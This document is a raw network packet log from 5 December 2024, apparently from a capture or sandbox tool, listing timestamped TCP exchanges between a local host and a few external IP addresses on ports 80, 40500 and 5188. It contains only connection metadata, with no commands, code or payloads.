                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:06.074681044 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:06.074717999 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:06.075790882 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:06.075822115 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:06.075845003 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:06.075865984 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:06.076965094 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:06.076991081 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:06.077001095 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:06.077022076 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:06.078212023 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:06.078253031 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:06.078305006 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:06.078340054 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:06.079402924 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:06.079442978 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:06.079514980 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:06.079552889 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:06.080657959 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:06.080694914 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:06.080758095 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:06.080790997 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:06.081899881 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:06.081943035 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:06.082052946 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:06.082091093 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:06.083082914 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:06.083125114 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:06.083164930 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:06.083197117 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:06.160809994 CET8049781185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:06.197113037 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:06.197165966 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:06.197179079 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:06.197212934 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:06.197681904 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:06.197721004 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:06.197812080 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:06.197845936 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:06.198801041 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:06.198843956 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:06.198873043 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:06.198909044 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:06.199965000 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:06.200005054 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:06.215140104 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:06.215161085 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:06.215192080 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:06.215205908 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:06.215648890 CET8049775185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:06.215689898 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:07.374361992 CET8049781185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:07.374403000 CET8049781185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:07.374416113 CET8049781185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:07.374435902 CET4978180192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:07.374459982 CET8049781185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:07.374479055 CET4978180192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:07.374512911 CET4978180192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:07.374541044 CET8049781185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:07.374552965 CET8049781185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:07.374584913 CET4978180192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:07.374667883 CET8049781185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:07.374680042 CET8049781185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:07.374692917 CET8049781185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:07.374713898 CET4978180192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:07.374728918 CET4978180192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:07.441659927 CET4977580192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:08.111939907 CET4975740500192.168.2.11109.68.122.14
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:08.275528908 CET4050049757109.68.122.14192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:10.096770048 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:10.216712952 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:10.218445063 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:10.218511105 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:10.338282108 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:11.556622982 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:11.586393118 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:11.707461119 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:11.731762886 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:11.855422974 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:11.855519056 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:11.855722904 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:11.975652933 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.041395903 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.050137997 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.170111895 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.503911018 CET4978180192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.505728006 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.505755901 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.505768061 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.505812883 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.505858898 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.505871058 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.505881071 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.505893946 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.505898952 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.505959034 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.506071091 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.506123066 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.514744043 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.514837980 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.514897108 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.522767067 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.522921085 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.523061037 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.624161005 CET8049781185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.625621080 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.673207045 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.697736979 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.697830915 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.697882891 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.701637983 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.701853037 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.701925039 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.709714890 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.709860086 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.710105896 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.717691898 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.717773914 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.717834949 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.725720882 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.725820065 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.725877047 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.733740091 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.733817101 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.733882904 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.741714001 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.741755009 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.741890907 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.749711990 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.749800920 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.749849081 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.757855892 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.757869959 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.757942915 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.765741110 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.765827894 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.765883923 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.773962021 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.774076939 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.774323940 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.793092966 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.793217897 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.793271065 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.797213078 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.846170902 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.890064001 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.890162945 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.890368938 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.893954039 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.894073009 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.894145012 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.902107954 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.902144909 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.902204037 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.910007954 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.910079002 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.910175085 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.918034077 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.918302059 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.919833899 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.925728083 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.926033020 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.926081896 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.933448076 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.933721066 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.933780909 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.938302040 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.938411951 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.938502073 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.944109917 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.944219112 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.944300890 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.945839882 CET8049781185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.945900917 CET8049781185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.945904016 CET4978180192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.945975065 CET4978180192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.946758986 CET4978180192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.946793079 CET4978180192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.948051929 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.948123932 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.948261976 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.949743986 CET8049781185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.949851990 CET8049781185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.949903965 CET4978180192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.951741934 CET4978180192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.952917099 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.953051090 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.953131914 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.955204010 CET8049781185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.955255032 CET4978180192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.955277920 CET8049781185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.955334902 CET4978180192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.957832098 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.957915068 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.957962990 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.962857962 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.962905884 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.963203907 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.963566065 CET8049781185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.963618040 CET4978180192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.963689089 CET8049781185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.963728905 CET4978180192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.967729092 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.967744112 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.967793941 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.972028017 CET8049781185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.972083092 CET8049781185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.972137928 CET4978180192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.972491026 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.972599983 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.972668886 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.977437019 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.977519035 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.977590084 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.980325937 CET8049781185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.982314110 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.982382059 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.982382059 CET4978180192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.983779907 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.987226963 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.987282991 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.987340927 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.992481947 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.992544889 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.992607117 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.996903896 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.996984005 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.997033119 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.001822948 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.001861095 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.001902103 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.016690969 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.016779900 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.016952038 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.019141912 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.019224882 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.019335032 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.024049044 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.024101973 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.024195910 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.028867960 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.070669889 CET8049781185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.070755005 CET8049781185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.070849895 CET4978180192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.074887037 CET8049781185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.075015068 CET8049781185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.075069904 CET4978180192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.075742960 CET4978180192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.080338955 CET8049781185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.080387115 CET8049781185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.080461025 CET4978180192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.080483913 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.081793070 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.081897974 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.083760977 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.084161997 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.084326982 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.087762117 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.088737965 CET8049781185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.088793039 CET4978180192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.089008093 CET8049781185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.089066029 CET4978180192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.089098930 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.089112997 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.089168072 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.093656063 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.093719006 CET51884979292.255.85.66192.168.2.11
